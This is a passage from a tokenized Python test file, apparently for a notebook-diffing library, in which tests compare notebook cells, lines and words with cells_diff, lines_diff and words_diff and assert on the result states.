"<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells7 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells8 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines0 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines1 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines2 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_line3 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines4 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines5 ( ) : <EOL> A = [ '<STR_LIT:test>' , '<STR_LIT:U+0020>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines6 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines7 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines8 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines9 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines10 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words0 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words1 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT:U+0020>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words2 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words3 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words4 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = False ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines_same ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines_different ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words_same ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_empty_lines ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_empty_words ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT:U+0020>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words_different ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_word ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_word2 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells_same ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells_different ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:y>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:w>' ] } <EOL> ] <EOL> result = cells_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_empty ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified2 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified_items ( ) : <EOL> header_item = { <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> } ) , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> } ) 